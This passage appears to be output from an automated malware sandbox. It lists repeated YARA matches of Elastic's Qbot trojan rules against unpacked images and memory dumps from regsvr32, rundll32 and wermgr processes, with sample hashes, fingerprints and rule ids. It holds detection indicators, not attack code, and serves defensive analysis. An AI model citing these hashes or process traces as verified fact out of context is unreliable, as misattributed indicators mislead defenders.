Source: 9.0.wermgr.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 9.0.wermgr.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 8.2.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 8.2.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 7.0.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 7.0.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 4.3.rundll32.exe.4960000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 4.3.rundll32.exe.4960000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 8.0.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 8.0.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 7.2.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 7.2.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 5.2.rundll32.exe.4ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 5.2.rundll32.exe.4ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 3.2.regsvr32.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 3.2.regsvr32.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 7.2.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 7.2.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 5.3.rundll32.exe.3000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 5.3.rundll32.exe.3000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 4.2.rundll32.exe.4af0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 4.2.rundll32.exe.4af0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 4.3.rundll32.exe.4960000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 4.3.rundll32.exe.4960000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 3.3.regsvr32.exe.2b70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 3.3.regsvr32.exe.2b70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 3.2.regsvr32.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 3.2.regsvr32.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 8.0.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 8.0.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 5.2.rundll32.exe.4ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 5.2.rundll32.exe.4ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown

Source: diatomaceous.dat.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: 4.2.rundll32.exe.4af0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 4.2.rundll32.exe.4af0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 3.3.regsvr32.exe.2b70000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 3.3.regsvr32.exe.2b70000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 9.0.wermgr.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 9.0.wermgr.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 8.2.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 8.2.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 7.0.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 7.0.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 5.3.rundll32.exe.3000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 5.3.rundll32.exe.3000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 9.0.wermgr.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 9.0.wermgr.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 8.2.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 8.2.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 7.0.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 7.0.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 4.3.rundll32.exe.4960000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 4.3.rundll32.exe.4960000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 8.0.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 8.0.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 7.2.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 7.2.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 5.2.rundll32.exe.4ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 5.2.rundll32.exe.4ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 3.2.regsvr32.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 3.2.regsvr32.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 7.2.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 7.2.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 5.3.rundll32.exe.3000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 5.3.rundll32.exe.3000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 4.2.rundll32.exe.4af0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 4.2.rundll32.exe.4af0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 4.3.rundll32.exe.4960000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 4.3.rundll32.exe.4960000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 3.3.regsvr32.exe.2b70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 3.3.regsvr32.exe.2b70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 3.2.regsvr32.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 3.2.regsvr32.exe.2bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
